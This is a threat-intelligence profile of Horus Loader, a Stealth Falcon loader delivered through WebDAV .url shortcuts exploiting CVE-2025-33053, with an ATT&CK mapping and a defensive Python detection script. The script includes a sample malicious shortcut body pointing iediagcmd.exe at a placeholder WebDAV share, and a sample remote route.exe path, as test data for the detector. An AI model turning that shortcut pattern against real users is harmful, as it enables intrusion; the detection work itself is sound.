Mallory malware profile · Used by 1 actor · Exploits 1 CVE

Horus Loader

Horus Loader is a custom multi-stage Windows loader used in 2025 espionage activity attributed by Check Point Research to Stealth Falcon (aka FruityArmor). It was observed in an infection chain exploiting the Windows WebDAV remote code execution zero-day CVE-2025-33053. The attacks used phishing-delivered .url shortcut files disguised as PDF documents; the shortcut set its working directory to an attacker-controlled WebDAV server and launched the legitimate Windows utility iediagcmd.exe, which was then induced to execute an attacker-supplied fake route.exe from the remote share. That fake route.exe installed Horus Loader.

Based on the reporting, Horus Loader is designed to be flexible and evasive. It is described as using code virtualization, anti-analysis techniques, string encryption, and control-flow flattening to hinder detection and reverse engineering. Its role in the chain is to clean up traces from earlier stages, bypass basic detection mechanisms, present a decoy PDF document to reduce user suspicion, and discreetly deploy or execute the final payload, Horus Agent.

The associated campaign targeted high-value government and defense organizations, with reported targeting in Turkey, Qatar, Egypt, and Yemen, and Stealth Falcon is described as a long-running espionage actor focused on political and strategic entities in the Middle East and Africa. Horus Loader was specifically linked to delivery of Horus Agent, a custom C++ implant built for the Mythic C2 framework. High-confidence behavioral context includes execution via attacker-hosted WebDAV infrastructure, use in a multi-stage loader chain, decoy document delivery, and final-stage deployment of Horus Agent.
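As an added defensive example (not part of the Mallory page, and not code from Check Point's reporting), the Python below sketches two detection heuristics for the delivery chain described above: flagging Internet Shortcut (.url) files whose WorkingDirectory points at a remote share while the URL launches a local executable, and flagging process-creation telemetry in which iediagcmd.exe spawns a route.exe from outside the Windows system directory. The .url body, the host name webdav.example and the ProcEvent records are constructed sample data; the ProcEvent shape is an assumption standing in for whatever fields your EDR or Sysmon process-creation events carry.

```python
"""Detection heuristics for the Horus Loader delivery chain (added example).

Two checks over constructed sample data:
  1. A .url Internet Shortcut whose WorkingDirectory is a UNC/WebDAV share
     while its URL launches a local executable.
  2. Process-creation events in which iediagcmd.exe spawns a route.exe that
     does not live in the Windows system directory.
"""
import configparser
import ntpath
from dataclasses import dataclass

# Lower-cased prefixes where the genuine route.exe is expected to live.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_url_shortcut(text: str) -> dict:
    """Return the [InternetShortcut] keys of a .url body, lower-cased (empty if absent)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str.lower
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp["InternetShortcut"])


def is_unc_path(path: str) -> bool:
    r"""True for \\host\share style paths, including the \\host@80\share WebDAV form."""
    return path.startswith("\\\\") or path.startswith("//")


def shortcut_findings(text: str) -> list:
    """Describe why a .url body looks like a loader launcher rather than a web bookmark."""
    keys = parse_url_shortcut(text)
    findings = []
    working_dir = keys.get("workingdirectory", "")
    url = keys.get("url", "").lower()
    if is_unc_path(working_dir):
        findings.append(f"WorkingDirectory is a remote share: {working_dir}")
    if url.startswith("file:") and url.endswith(".exe"):
        findings.append(f"URL launches a local executable: {url}")
    return findings


@dataclass
class ProcEvent:
    """Minimal process-creation record (assumed shape; map your EDR/Sysmon fields onto it)."""
    parent_image: str
    image: str


def flag_proxy_execution(events: list) -> list:
    """Flag iediagcmd.exe -> route.exe where route.exe is outside the system directory.

    The diagnostics tool legitimately runs the real route.exe from System32, so the
    image path, not the child's name, is what separates the abuse from normal use.
    """
    hits = []
    for ev in events:
        if ntpath.basename(ev.parent_image).lower() != "iediagcmd.exe":
            continue
        if ntpath.basename(ev.image).lower() != "route.exe":
            continue
        if not ev.image.lower().startswith(SYSTEM_DIRS):
            hits.append(f"{ev.parent_image} -> {ev.image}")
    return hits


# Constructed sample .url body (webdav.example is a placeholder host).
SAMPLE_URL = r"""[InternetShortcut]
URL=file:///C:/Windows/System32/iediagcmd.exe
WorkingDirectory=\\webdav.example\share
"""

# Constructed sample process-creation events.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\iediagcmd.exe", r"C:\Windows\System32\route.exe"),   # benign
    ProcEvent(r"C:\Windows\System32\iediagcmd.exe", r"\\webdav.example\share\route.exe"),  # hit
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\route.exe"),          # unrelated
]

if __name__ == "__main__":
    for line in shortcut_findings(SAMPLE_URL) + flag_proxy_execution(SAMPLE_EVENTS):
        print(line)
```

The shortcut check is useful at the mail gateway or sandbox stage, before anything runs; the process check is what you would express as a Sigma rule on process-creation events. Both key on behaviour the reporting describes (remote working directory, system binary proxying a look-alike child from a share) rather than on file hashes, so they survive loader rebuilds.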


EXPLOITED CVES

Vulnerabilities exploited

1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

1 CVE
CVE-2025-33053: WebDAV / Internet Shortcut Files Remote Code Execution in Microsoft Windows (exploited in the wild)

"...a multi-stage loader we called Horus Loader..."

via Check Point Research blog (blog.checkpoint.com)
THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

Stealth Falcon

"This causes iediagcmd.exe to run the attacker's fake route.exe program from the remote server, which installs a custom multi-stage loader called 'Horus Loader.'"

via BleepingComputer (bleepingcomputer.com)
MITRE ATT&CK

Techniques & procedures

9 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques
T1566 Phishing (evidence: 1)

The latest campaign from Stealth Falcon began with phishing emails. In one incident observed by Check Point, hackers targeted a Turkish defense organization...

T1566.001 Spearphishing Attachment (evidence: 2)

Check Point uncovered the campaign after a victim uploaded the phishing email attachment to VirusTotal in March. On running the file, Check Point found the malicious file began to harvest diagnostic data and redirected the infected devices' WebDAV path to an attacker-controlled server.

Execution

2 techniques
T1203 Exploitation for Client Execution (evidence: 2)

Microsoft patched a zero-day vulnerability in its web application framework exploited by an Emirati threat group... The flaw, tracked as CVE-2025-33053, is a remote code execution vulnerability in... WebDAV.

T1204 User Execution (evidence: 1)

"Once the shortcut file was activated, it kicked off the next phase of the attack"

Stealth

4 techniques
T1036 Masquerading (evidence: 1)

"a .url file disguised as a PDF document"

T1036.004 Masquerade Task or Service (evidence: 1)

"Drop and open a decoy document to avoid suspicion"; "While the victim is occupied with viewing the decoy document"

T1070 Indicator Removal (evidence: 1)

On execution, it cleaned up previous utilities to evade detection and then deployed a decoy document and the final Horus Agent payload.

T1218 System Binary Proxy Execution (evidence: 1)

"abusing legitimate Windows tools... They tricked a built-in Windows utility into executing a malicious program"

T1105 Ingress Tool Transfer (evidence: 1)

Once the connection was established, a malicious file named route.exe executed from the attacker's WebDAV server that deployed the Horus loader.
